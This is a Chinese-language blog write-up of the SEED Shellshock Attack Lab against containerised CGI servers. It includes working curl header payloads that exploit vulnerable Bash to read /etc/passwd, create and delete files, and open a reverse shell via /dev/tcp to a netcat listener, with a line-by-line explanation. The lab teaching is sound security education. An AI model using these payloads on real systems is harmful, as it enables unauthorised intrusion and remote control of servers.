shellshock Attack Lab

詳見我的個人博客：shellshock Attack Lab

實驗概述

實驗背景

2014 年 9 月 24 日，發現了 Bash 中的一個嚴重漏洞 Shellshock，這個漏洞可以用于許多系統，可以遠程啟動，也可以從本地機器啟動，在這個實驗中,學生們需要研究這種攻擊，這樣才能了解Shellshock 的脆弱性. 此次實驗包括以下四個內容：

Shellshock
Environment variables
Function definition in bash
Apache and CGI programs

實驗環境

此次實驗是基于Ubuntu 20.04 VM進行測驗的，該虛擬機可以在SEED網站上進行下載. 自在我們的實驗環境中安裝了containers，此次實驗也不再依賴于SEED VM. 你可以直接在其他的VMs，物理機或者VMs云平臺.

環境搭建

DNS的配置

在我們的安裝中，網路服務端container的IP地址是10.9.0.80. 服務器的主機名叫做www.seedlab-shellshock.com. 我們需要將這個名字映射到IP地址上. 另外同時將下面的內容添加到/etc/hosts，可以通過root權限進行修改:

10.9.0.80			www.seedlab-shellshock.com

Container的配置以及一些常用命令

首先下載Labsetup.zip到VM上，將它進行解壓到當前檔案夾中，進入Labsetup檔案夾中，同時使用docker-compose.yml檔案頭配置你的實驗環境. 具體的解釋，Dockerfile相關資訊以及docker命令的介紹在user manual. 在實驗前最好是先看看user manual熟悉一下，下面進行一些簡單的介紹.

在檔案中有三個重要的檔案是/image_www/bash_shellshock, docker-compose.yml, /image_www/Dockerfile，其中bash_shellshock就是實驗中需要使用的具有漏洞版本的bash，下面是Dockerfile的內容：

FROM handsonsecurity/seed-server:apache-php

COPY bash_shellshock /bin/
COPY vul.cgi getenv.cgi /usr/lib/cgi-bin/
COPY server_name.conf  /etc/apache2/sites-available
RUN  chmod 755 /bin/bash_shellshock \
     && chmod 755 /usr/lib/cgi-bin/*.cgi  \
     && a2ensite server_name.conf  

CMD service apache2 start && tail -f /dev/null

FROM：它代表的是這個container是基于什么鏡像建立的
COPY：代表將file拷貝到container對應的檔案夾下
RUN：代表container會執行的一些命令
CMD：在container啟動后會執行的命令

另外一個檔案就是docker-compose.yml，其內容如下：

version: "3"

services:
    victim:
        build: ./image_www
        image: seed-image-www-shellshock
        container_name: victim-10.9.0.80
        tty: true
        networks:
            net-10.9.0.0:
                ipv4_address: 10.9.0.80
    HostB:
        image: seed-image-www-shellshock
        container_name: victim-10.9.0.81
        tty: true
        networks:
            net-10.9.0.0:
                ipv4_address: 10.9.0.81
    HostC:
        image: seed-image-www-shellshock
        container_name: victim-10.9.0.82
        tty: true
        networks:
            net-10.9.0.0:
                ipv4_address: 10.9.0.82
                  

networks:
    net-10.9.0.0:
        name: net-10.9.0.0
        ipam:
            config:
                - subnet: 10.9.0.0/24

該services部分列出了我們要構建和運行的所有容器.
該networks部分列出了我們需要創建的所有網路，每個網路都有一個名稱，該名稱由容器條目使用.
該build條目：該條目表示容器鏡像的檔案夾名稱，并將使用Dockerfile里面的內容來構建容器鏡像，如果一個服務沒有build入口，則意味著容器不需要構建自己的鏡像；它使用image條目中指定的現有影像，需要注意的是，一個鏡像可以被多個容器實體使用.
該image條目：影像的名稱在這個條目中指定，如果沒有這個條目，docker 會為這個鏡像生成一個名字.
該container_name條目：建設中的形象后，撰寫將從這一形象開始一個容器實體，并在此項規定的容器實體的名稱，在我們的命名約定中，我們將 IP 地址附加到主機名.
tty: true: 表示在運行容器時，使用該 -t選項，這是以后在容器上獲得shell提示所必需的.
該networks條目：它指定了該容器連接到與對應于集裝箱的IP地址一起的網路的名稱，多個網路可以連接到一個容器.

注意：當Docker創建網路時，它會自動將主機（即VM）附加到網路上，并給出.1其IP地址，即，對于 10.9.0.0/24網路，主機的 IP 地址是 10.9.0.1，因此，宿主機可以直接與所有容器進行通信.

build, start, shutdown實驗環境的指令：

docker-compose build
docker-compose up
docker-compose down

部分指令的縮寫/別名：

dcbuild        # Alias for: docker-compose build
dcup           # Alias for: docker-compose up
dcdown         # Alias for: docker-compose down
dockps         # Alias for: docker ps --format "{{.ID}}  {{.Names}}"
docksh  <id>   # Alias for: docker exec -it <id> /bin/bash

container的常用指令：

docker network ls              # List all the networks
docker container restart <id>  # Restart a container
docker container stop    <id>  # Stop a container
docker container start   <id>  # Start a container

Web服務器以及CGI

此次實驗將在Web服務器container上進行Shellshock攻擊. CGI作為在應用程式以及網頁的動態內容生成的一種標準方式，也是被大多是Web服務端支持的. 許多的CGI程式都是使用shell腳本，因此對于一個CGI程式的執行，它一定是有shell程式首先進行參與的，這樣一來就會給遠程用戶進行惡意的攻擊創造機會. 如果shell程式比較脆弱，那么我們是可以通過這個Shellshock的方式在服務端獲得高級權限的.

在這個Web服務器的container上是已經配置好了一個非常簡單的CGI程式(vul.cgi). 它的作用也就僅僅是列印出“Hello World”. 這個CGI程式通過Dokerfile配置中的COPY vul.cgi getenv.cgi /usr/lib/cgi-bin/拷貝到對應的container的檔案夾，并且在這之前你需要將其設定為可執行，比如可以執行sudo chmod a+x vul.cgi，當然Dockerfile也是非常周到的在RUN中添加了chmod 755 /usr/lib/cgi-bin/*.cgi這樣一條指令，作用類似.

Listing 1: vul.cgi

#!/bin/bash shellshock
echo "Content-type: text/plain"
echo
echo
echo "Hello World"

在這個CGI程式中我們可以看出它是使用了/bin/bash_shellshock而不是/bin/bash. 這一步是必須的因為大于4.1的bash已經都修復了這個bug. 假如現在通過Web進入這個CGI程式，你可以直接在游覽器中直接輸入跳轉地址http://localhost_address/cgi-bin/vul.cgi，或者在shell中輸入指令curl http://10.9.0.80/cgi-bin/vul.cgi，能夠看到都會顯示Hello World的字樣

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-ZSaFK88J-1636289676945)(…/images/blog/image-20211029205720789.png)]

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-cUhs2e30-1636289676950)(…/images/blog/image-20211029205837117.png)]

實驗任務

Task 1：Experimenting with Bash Function

任務要求：在上面的內容已經介紹了環境的搭建，我們所需要版本的bash也都在/Labsetup/image_www內(bash_shellshock)，而我們第一個實驗就是需要使用這個bash，你可以在你的container內或者是本地檔案夾下運行這個shell程式. 你需要自己設計一個實驗來驗證你的bash是否能夠通過Shellshock進行攻擊成功. 另外再使用以下做好補丁后的bash進行又一次的實驗，并得出你的結論.

我們首先用本地(不用container)來進行驗證，這個例子就是最典型的例子，foo='() { echo "Attack Success!";}; echo "Under Attack!";'，然后將foo變數export匯出，通過bash_shellshock傳遞到子程式后，就會將foo視為一個函式，同時執行echo "Under Attack!"：

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-d3ZzZIXj-1636289676952)(…/images/blog/image-20211029211443847.png)]

在使用以下帶有補丁的bash運行同樣的操作，顯然不會出現上面的情況：

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-eduxfHtW-1636289676955)(…/images/blog/image-20211029220348635.png)]

然后使用container進行同樣的實驗：

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-dQ0sTAVf-1636289676957)(…/images/blog/image-20211029215614715.png)]

Conclusion: 我們知道可以通過export指令將shell變數轉化為env變數，同時這個env變數是會傳遞給子程式的，但是在bash_shellshock中，是有一個嚴重漏洞的，會檢測() {然后把它當作是函式，同時對于;后面的會當成指令進行執行，于是就會出現以上的場景；但是如果使用4.1以上的bash版本，它會將變數中的指令決議出來而不是執行它們，那么就會進行正常的顯示；

Task 2: Passing Data to Bash via Environment Variable

任務要求：為了利用Shellshock vulnerability去攻擊CGI程式，攻擊者需要將資料傳遞給有漏洞的bash程式，在這之前需將將這個資料先匯出到env變數. 在這個task中，我們需要知道如何實作這個步驟. 在環境中已經寫好了getenv.cgi在服務器上(COPY vul.cgi getenv.cgi /usr/lib/cgi-bin/拷貝到container的/usr/lib/cgi-bin中)，這個CGI程式將會幫組你了解什么樣的用戶資料才能夠CGI程式的env變數. 以下這個程式會列印出全部的環境變數：

Listing 2: getenv.cgi

#!/bin/bash_shellshock
echo "Content-type: text/plain"
echo
echo "****** Environment Variables ******"
strings /prog/&&/environ

Using brower

我們知道以上的程式是將所有的env變數列印出來. 一般而言，你會看到下圖的內容. 請確認一下游覽器設定的env變數的值，可以通過HTTP Header Live擴展來捕捉你的HTTP請求，并將請求與服務器列印出的env變數進行比較. 最后得出你的結論：

首先在游覽器中輸入http://10.9.0.80/cgi-bin/getenv.cgi

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-8tLGBEC5-1636289676959)(…/images/blog/image-20211029222434612.png)]

接著是Fn + F12打開網頁的詳細，然后點繼Network接著是找到File對應的getenv.cgi，點擊Headers下拉到最后可以看到Request Headers的具體內如，如下：

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-xKmRC7xm-1636289676960)(…/images/blog/image-20211029230853771.png)]

Conclusion: 在觀察env變數和Request Headers之后，可以發現HTTP-ACCEPT與Accept，HTTP-ACCEPT——ENCODING與Accept-Encoding，HTTP-ACCEPT-LANGUAGE與Accept-Language之類的，都可以對應起來且都是一樣的.

Using curl

如果需要將env變數設定為任意的數值，我們就需要修改游覽器的行為，這會變得非常復雜. 但是我們有curl指令，這個指令能夠讓你控制大多的HTTP頭部，以下是常用的命令：

$ curl -v http://localhost_address/cgi-bin/getenv.cgi	#  the -v field can print out the header of the HTTP request
'''  the -A, -e, and -H options can set some fields in the header request, and you need to figure out what fileds are set by each of them'''
$ curl -A "my data" -v http://localhost_address/cgi-bin/getenv.cgi
$ curl -e "my data" -v http://localhost_address/cgi-bin/getenv.cgi
$ curl -H "AAAAAA: BBBBBB" -v http://localhost_address/cgi-bin/getenv.cgi

基于以上實驗，請描述curl的那些指令是用來將資料注入到CGI程式的env變數中的.

現在通過curl來訪問該CGI程式，使用“-v”選項，curl會列印出HTTP請求和來自服務器的回應：

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-dt31o97U-1636289676962)(…/images/blog/image-20211029233013843.png)]

上面標記的HTTP請求頭中的User -Agent欄位中，該欄位的目的是向服務器提供一些客戶端瀏覽器的資訊、它可以幫助服務器根據不同瀏覽器型別對網頁內容的顯示方式進行優化，從上面的例子中可以看出，該欄位表明客戶端是curl，下面執行以下指令curl -A "My data" -v http://10.9.0.80/cgi-bin/getenv.cgi:

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-DZ7vlrVf-1636289676964)(…/images/blog/image-20211029233315787.png)]

可以看到使用option -A能夠對User-Agent進行修改，變成了My data，同樣的option -e，對Refeter進行修改：

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-wuljj7ER-1636289676965)(…/images/blog/image-20211029233613133.png)]

而對于option -H可以對大部分的鍵值對進行修改，如下：

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-ElOm5xiJ-1636289676966)(…/images/blog/image-20211029233822939.png)]

Task 3: Launching the Shellshock Attack

任務要求：現在進行Shellshock Attack，這個攻擊并不是一欄與CGI程式里面的內容，而是目標在bash程式，因為它是在CGI腳本執行之前執行的. 你的作業就是通過http://localhost_address/cgi-bin/vul.cgi進行你的攻擊，所以你可以通過服務器執行任意指令.

如果命令有純文本輸出，并且希望回傳輸出，則輸出需要遵循協議：應該以Content-type開始：文本/純文本，然后是一個空行，然后您可以放置純文本輸出. 例如，如果希望服務器回傳其檔案夾中的檔案串列，則該命令如下所示：

echo Content_type: text/plain; echo; /bin/ls -l

在這個task中請用三種不同方式使用shellshock去攻擊CGI程式，你需要完成以下的小任務，對于每個任務，你只要使用一個方法，但是總共需要使用三種方式.

讓服務器回傳/etc/passwd的內容；

執行命令：

curl -A "() { echo "hello";}; echo Content_type: text/plain; echo; /bin/cat /etc/passwd" http://10.9.0.80/cgi-bin/vul.cgi

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-UsnPdaGO-1636289676967)(…/images/blog/image-20211030001348267.png)]

讓服務器告訴你行程用戶的ID，你可以使用/bin/id命令列印出ID資訊；

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-i4b2xbRG-1636289676969)(…/images/blog/image-20211030001442777.png)]

讓服務器在/tmp檔案夾下創建檔案，你需要進入container去看是否真的創建成功，或者使用另外一個shellshock攻擊/tmp的串列；

curl -H  "test: () { echo hello; }; echo Content_type: text/plain; echo; /bin/touch  /tmp/test " http://10.9.0.80/cgi-bin/vul.cgi

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-6DmSYsTo-1636289676970)(…/images/blog/image-20211030091512591.png)]

讓服務器洗掉你在/tmp中創造的檔案；

curl -e  " () { echo hello; }; echo Content_type: text/plain; echo; /bin/rm  /tmp/test " http://10.9.0.80/cgi-bin/vul.cgi

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-H5xES0G3-1636289676971)(…/images/blog/image-20211030091853210.png)]

Q1: 能否從服務器上竊取影子檔案的內容？為什么能/不能？在小任務2中獲得的資訊應該會給您一個線索

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-bj0emm2z-1636289676972)(…/images/blog/image-20211030003738015.png)]

Shadow的所有者是root，有rw的權限；所在組是shadow，組內用戶有r的權限，其他組用戶無權限讀這個檔案，vul.cgi的所有者是seed，有rw的權限；所在組是seed，有rx權限.
所以通過vul.cgi獲得bash_shellshock之后，執行指令. 對于shadow來說，vul.cgi是其他組內用戶，沒有讀的權限，所以不可以通過vul.cgi執行程式獲得shadow的內容.

Q2: HTTP-GET請求通常在URL中附加資料，在?之后，這可能是我們可以用來發動攻擊的另一種方法，在下面的示例中，我們在URL中附加了一些資料，我們發現這些資料被用于設定以下環境變數：

$ curl "http://localhost_address/cgi-bin/getenv.cgi?AAAAA"
...
UERY_STRING=AAAAA
...

我們可以用這種方法來進行Shellshock攻擊嗎？請進行實驗，并根據實驗結果得出結論.

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-JPGYwPYO-1636289676973)(…/images/blog/image-20211030004328596.png)]

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-ZAibj2h2-1636289676974)(…/images/blog/image-20211030092850712.png)]

但是我們嘗試用相同的方式進行shellshock攻擊并不能成功，這是因為它只能將沒有空格的字串識別為環境變數，而如果存在空格會進行報錯.

Task 4: Getting a Reverse Shell via Shellshock Attack

任務要求：Shellshock漏洞允許攻擊在目標機器上運行任意命令，在實際的攻擊中，攻擊者通常選擇運行shell命令，而不是硬編碼Shell命令，只要shell程式還存在，這樣他們就可以使用這個shell來運行其他命令.

為了實作這一目標，攻擊者需要運行一個Reverse Shell. Reverse Shell是在機器上啟動的shell程序，其輸入和輸出由遠程計算機的某人控制. 基本上，shell運行在受害者的機器上，但它從攻擊者的機器上獲取輸入，并在攻擊者的機器上列印其輸出. Reverse Shell為攻擊者提供了一種方便的方式來在受損的機器上運行命令. 關于如何創建Reverse Shell的詳細解釋可以在SEED的書中找到. 我們還總結了第4部分中的解釋. 在此任務中，您需要演示如何使用Shellshock攻擊從受害者那里獲得Reverse Shell.

分別在兩個終端輸入：

nc -lvnp 9090
curl -A "() { echo hello;}; echo Content_type: text/plain; echo; echo; /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1" http://10.9.0.80/cgi-bin/vul.cgi

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-opxo08Us-1636289676975)(…/images/blog/image-20211030094011447.png)]

小知識：當Docker創建網路時，它會自動將主機（即VM）附加到網路上，并給出.1其IP地址. 即對于 10.9.0.0/24網路，主機的 IP 地址是 10.9.0.1. 因此，宿主機可以直接與所有容器進行通信.

可以左邊是攻擊者，在運行nc -lvnp 9090之后，它將成為一個TCP服務器，用來偵聽指定埠上的連接，此時如果服務器(右邊)，通過Shellshock進行攻擊，使它執行/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1(具體這條指令的意義可以看第四部分，注意10.9.0.1是你主機的埠)，命令在服務器機器上啟動一個bashshell，其輸入來自TCP連接，并輸出到相同的TCP連接. 在我們的實驗中，當bashshell命令在10.9.0.01上執行時，它會連接到從10.9.0.80上開始的netcat行程. 當出現www-data@0d5106002259:/usr/lib/cgi-bin$的時候，表示你已經得到了主機的Reverse Shell.

Task 5: Using the Patched Bash

任務要求：現在我們使用一個已經打過補丁的bash程式. 該程式/bin/bash是一個補丁版本. 請用此程式替換CGI程式的第一行. 重做任務3，并描述觀察結果.

首先修改vul.cgi檔案：

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-u2s9WpSI-1636289676976)(…/images/blog/image-20211030005341942.png)]

在執行Shellshock攻擊之前，一定要先重新dcbiuld以及dcup，這樣你修改的內容才會修改在你的容器中，換句話說，這樣才能夠使你的sh執行的是有補丁的bash而不是bash_shellshock，接著執行task 3的相同指令，結果如下：

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-j8MGcZ7m-1636289676977)(…/images/blog/image-20211030095353256.png)]

觀察結果發現，結果不能夠正常的執行.

Guidlelines: Creating Reverse Shell

Reverse Shell的關鍵思想是將其標準輸入、輸出和錯誤設備重定向到網路連接，這樣shell就可以從連接中獲取輸入，并列印出輸出到連接. 在連接的另一端是由攻擊者運行的一個程式；該程式只是顯示另一端來自shell的內容，并通過網路連接將攻擊者輸入的內容發送到shell. 攻擊者常用的程式是netcat，如果使用“-l”選項運行，它將成為一個TCP服務器，用來偵聽指定埠上的連接，這個服務器程式基本上列印出客戶端發送的內容，并將運行服務器的用戶輸入的內容發送給客戶端，在接下來的實驗中，netcat(簡稱nc)用于偵聽埠9090上的連接.

Attacker(10.0.2.6):$ nc -nv -l 9090 # Waiting for reverse shell
Listening on 0.0.0.0 9090
Connection received on 10.0.2.5 39452
Server(10.0.2.5):$ # Reverse shell from 10.0.2.5.
Server(10.0.2.5):$ ifconfig
ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.5 netmask 255.255.255.0 broadcast 10.0.2.255
...

上述nc命令將阻塞，等待連接. 我們現在直接在服務器機器（10.0.2.5）上運行以下bash程式來模擬攻擊者在通過Shellshock攻擊損害服務器后將運行什么. 此bash命令將觸發到攻擊者計算機的9090埠的TCP連接，并將創建一個反向shell. 我們可以從上述結果中看到shell提示符，表明shell正在服務器機器上運行；我們可以鍵入ifonfig命令來驗證IP地址確實是10.0.2.5，它屬于服務器機器. 以下是bash命令：

Server(10.0.2.5):$ /bin/bash -i > /dev/tcp/10.0.2.6/9090 0<&1 2>&1

上述命令表示通常會在受損的服務器上執行的命令. 這是相當復雜的，我們的詳細解釋如下：

“/bin/bash-i”：選項i代表互動式的，這意味著殼式必須是互動式的（必須提供shell提示符）
“>/dev/tcp/10.0.2.6/9090”：這導致殼的輸出設備（輸出）被重定向到10.0.2.6埠9090的TCP連接. 在Unix系統中，stdout的檔案描述符為1
“0<&1”：檔案描述符0表示標準輸入設備(stdin). 此選項告訴系統使用標準輸出設備作為標準輸入設備. 由于stdout已經被重定向到TCP連接，這個選項基本上表示shell程式將從相同的TCP連接獲得其輸入.
“2>&1”：檔案描述符2表示標準錯誤標準. 這將導致錯誤輸出被重定向到stdout，即TCP連接.

總之，“/bin/bash-i>/dev/tcp/10.0.2.6/90900<&12>&1”命令在服務器機器上啟動一個bashshell，其輸入來自TCP連接，并輸出到相同的TCP連接. 在我們的實驗中，當bashshell命令在10.0.2.5上執行時，它會連接到從10.0.2.6上開始的netcat行程，這是通過netcat顯示的 "Connection from 10.0.2.5 …"訊息來確認的.

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/352115.html

標籤：其他

上一篇：dc-4靶機滲透記錄

下一篇：硬刪macfee

shellshock-Attack-Lab